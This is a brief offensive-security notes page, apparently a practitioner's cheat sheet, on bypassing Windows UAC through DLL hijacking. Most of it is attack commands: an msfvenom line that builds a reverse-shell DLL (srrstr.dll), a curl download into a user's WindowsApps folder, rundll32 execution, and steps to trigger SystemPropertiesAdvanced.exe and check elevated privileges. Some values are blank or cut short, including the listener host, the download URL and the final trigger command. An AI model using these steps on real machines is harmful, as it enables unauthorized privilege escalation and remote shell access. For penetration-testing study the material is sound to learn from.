Here you would be looking more into UAC Bypasses, because every account. even elevated one have two types of tokens, low and high privilege. And sometimes after we got some high-privilege user we need to bypass UAC to actually use high-privilege token. Here I would write about UAC techniques I used during machines or engagements.

UAC Bypass with DLL Hijacking

Review Path Variable

PS C:/> cmd /c echo %PATH%

Generate Malicious DLL

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1337 -f dll > srrstr.dll

Download DLL

curl http:/ -O "C:\Users\ven17\AppData\Local\Microsoft\Windows Apps\srrstr.dll"

Execute Malicious DLL on Target

rundll32 shell32.dll,Control_RunDLL C:\Users\ven17\AppData\Local\Microsoft\WindowsApps\srrstr.dll

Ensure No Existing rundll32 Instances

tasklist /svc | findstr "rundll32"
taskkill /PID <PID> /F

Execute SystemPropertiesAdvanced.exe for UAC Bypass


Verify Elevated Privileges

whoami /priv

